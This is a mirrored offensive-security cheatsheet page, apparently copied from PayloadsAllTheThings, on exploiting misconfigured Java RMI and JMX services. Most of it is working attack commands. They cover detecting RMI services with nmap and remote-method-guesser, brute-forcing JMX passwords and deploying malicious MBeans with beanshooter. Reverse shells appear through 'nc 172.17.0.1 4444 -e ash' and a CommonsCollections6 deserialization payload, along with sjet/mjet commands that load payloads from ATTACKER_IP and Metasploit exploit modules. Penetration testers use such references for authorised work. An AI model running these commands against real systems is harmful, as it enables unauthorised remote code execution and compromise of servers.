daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

index.md (7391B)


      1 ---
      2 title: "Java RMI"
      3 topic: "Java RMI"
      4 topicSlug: "java-rmi"
      5 sourcePath: "Java RMI/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Java%20RMI/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # Java RMI
     12 
     13 > Java RMI (Remote Method Invocation) is a Java API that allows an object running in one JVM (Java Virtual Machine) to invoke methods on an object running in another JVM, even if they're on different physical machines. RMI provides a mechanism for Java-based distributed computing.
     14 
     15 ## Summary
     16 
     17 * [Tools](#tools)
     18 * [Detection](#detection)
     19 * [Methodology](#methodology)
     20     * [RCE using beanshooter](#rce-using-beanshooter)
     21     * [RCE using sjet/mjet](#rce-using-sjet-or-mjet)
     22     * [RCE using Metasploit](#rce-using-metasploit)
     23 * [References](#references)
     24 
     25 ## Tools
     26 
     27 * [siberas/sjet](https://github.com/siberas/sjet) - siberas JMX exploitation toolkit
     28 * [mogwailabs/mjet](https://github.com/mogwailabs/mjet) - MOGWAI LABS JMX exploitation toolkit
     29 * [qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) - Java RMI Vulnerability Scanner
     30 * [qtc-de/beanshooter](https://github.com/qtc-de/beanshooter) - JMX enumeration and attacking tool.
     31 
     32 ## Detection
     33 
     34 * Using [nmap](https://nmap.org/):
     35 
     36   ```powershell
     37   $ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TARGET_IP -Pn -v
     38   1089/tcp open  java-rmi Java RMI
     39   | rmi-vuln-classloader:
     40   |   VULNERABLE:
     41   |   RMI registry default configuration remote code execution vulnerability
     42   |     State: VULNERABLE
     43   |       Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
     44   | rmi-dumpregistry:
     45   |   jmxrmi
     46   |     javax.management.remote.rmi.RMIServerImpl_Stub
     47   ```
     48 
     49 * Using [qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser):
     50 
     51   ```bash
     52   $ rmg scan 172.17.0.2 --ports 0-65535
     53   [+] Scanning 6225 Ports on 172.17.0.2 for RMI services.
     54   [+]  [HIT] Found RMI service(s) on 172.17.0.2:40393 (DGC)
     55   [+]  [HIT] Found RMI service(s) on 172.17.0.2:1090  (Registry, DGC)
     56   [+]  [HIT] Found RMI service(s) on 172.17.0.2:9010  (Registry, Activator, DGC)
     57   [+]  [6234 / 6234] [#############################] 100%
     58   [+] Portscan finished.
     59 
     60   $ rmg enum 172.17.0.2 9010
     61   [+] RMI registry bound names:
     62   [+]
     63   [+]  - plain-server2
     64   [+]   --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
     65   [+]       Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff7, 9040809218460289711]
     66   [+]  - legacy-service
     67   [+]   --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class)
     68   [+]       Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ffc, 4854919471498518309]
     69   [+]  - plain-server
     70   [+]   --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
     71   [+]       Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff8, 6721714394791464813]
     72   [...]
     73   ```
     74 
     75 * Using [rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework)
     76 
     77   ```bash
     78   use auxiliary/scanner/misc/java_rmi_server
     79   set RHOSTS <IPs>
     80   set RPORT <PORT>
     81   run
     82   ```
     83 
     84 ## Methodology
     85 
     86 If a Java Remote Method Invocation (RMI) service is poorly configured, it becomes vulnerable to various Remote Code Execution (RCE) methods. One method involves hosting an MLet file and directing the JMX service to load MBeans from a distant server, achievable using tools like mjet or sjet. The remote-method-guesser tool is newer and combines RMI service enumeration with an overview of recognized attack strategies.
     87 
     88 ### RCE using beanshooter
     89 
     90 * List available attributes: `beanshooter info 172.17.0.2 9010`
     91 * Display value of an attribute: `beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose`
     92 * Set the value of an attribute: `beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose true --type boolean`
     93 * Bruteforce a password protected JMX service: `beanshooter brute 172.17.0.2 1090`
     94 * List registered MBeans: `beanshooter list 172.17.0.2 9010`
     95 * Deploy an MBean: `beanshooter deploy 172.17.0.2 9010 non.existing.example.ExampleBean qtc.test:type=Example --jar-file exampleBean.jar --stager-url http://172.17.0.1:8000`
     96 * Enumerate JMX endpoint: `beanshooter enum 172.17.0.2 1090`
     97 * Invoke method on a JMX endpoint: `beanshooter invoke 172.17.0.2 1090 com.sun.management:type=DiagnosticCommand --signature 'vmVersion()'`
     98 * Invoke arbitrary public and static Java methods:
     99 
    100     ```ps1
    101     beanshooter model 172.17.0.2 9010 de.qtc.beanshooter:version=1 java.io.File 'new java.io.File("/")'
    102     beanshooter invoke 172.17.0.2 9010 de.qtc.beanshooter:version=1 --signature 'list()'
    103     ```
    104 
    105 * Standard MBean execution: `beanshooter standard 172.17.0.2 9010 exec 'nc 172.17.0.1 4444 -e ash'`
    106 * Deserialization attacks on a JMX endpoint: `beanshooter serial 172.17.0.2 1090 CommonsCollections6 "nc 172.17.0.1 4444 -e ash" --username admin --password admin`
    107 
    108 ### RCE using sjet or mjet
    109 
    110 #### Requirements
    111 
    112 * Jython
    113 * The JMX server can connect to a http service that is controlled by the attacker
    114 * JMX authentication is not enabled
    115 
    116 #### Remote Command Execution
    117 
    118 The attack involves the following steps:
    119 
    120 * Starting a web server that hosts the MLet and a JAR file with the malicious MBeans
    121 * Creating a instance of the MBean `javax.management.loading.MLet` on the target server, using JMX
    122 * Invoking the `getMBeansFromURL` method of the MBean instance, passing the webserver URL as parameter. The JMX service will connect to the http server and parse the MLet file.
    123 * The JMX service downloads and loades the JAR files that were referenced in the MLet file, making the malicious MBean available over JMX.
    124 * The attacker finally invokes methods from the malicious MBean.
    125 
    126 Exploit the JMX using [siberas/sjet](https://github.com/siberas/sjet) or [mogwailabs/mjet](https://github.com/mogwailabs/mjet)
    127 
    128 ```powershell
    129 jython sjet.py TARGET_IP TARGET_PORT super_secret install http://ATTACKER_IP:8000 8000
    130 jython sjet.py TARGET_IP TARGET_PORT super_secret command "ls -la"
    131 jython sjet.py TARGET_IP TARGET_PORT super_secret shell
    132 jython sjet.py TARGET_IP TARGET_PORT super_secret password this-is-the-new-password
    133 jython sjet.py TARGET_IP TARGET_PORT super_secret uninstall
    134 jython mjet.py --jmxrole admin --jmxpassword adminpassword TARGET_IP TARGET_PORT deserialize CommonsCollections6 "touch /tmp/xxx"
    135 
    136 jython mjet.py TARGET_IP TARGET_PORT install super_secret http://ATTACKER_IP:8000 8000
    137 jython mjet.py TARGET_IP TARGET_PORT command super_secret "whoami"
    138 jython mjet.py TARGET_IP TARGET_PORT command super_secret shell
    139 ```
    140 
    141 ### RCE using Metasploit
    142 
    143 ```bash
    144 use exploit/multi/misc/java_rmi_server
    145 set RHOSTS <IPs>
    146 set RPORT <PORT>
    147 # configure also the payload if needed
    148 run
    149 ```
    150 
    151 ## References
    152 
    153 * [Attacking RMI based JMX services - Hans-Martin Münch - April 28, 2019](https://web.archive.org/web/20201024121233/https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/)
    154 * [JMX RMI - MULTIPLE APPLICATIONS RCE - Red Timmy Security - March 26, 2019](https://web.archive.org/web/20250523025328/https://www.exploit-db.com/docs/english/46607-jmx-rmi-%E2%80%93-multiple-applications-remote-code-execution.pdf)
    155 * [remote-method-guesser - BHUSA 2021 Arsenal - Tobias Neitzel - August 15, 2021](https://web.archive.org/web/20210817144943/https://www.slideshare.net/TobiasNeitzel/remotemethodguesser-bhusa2021-arsenal)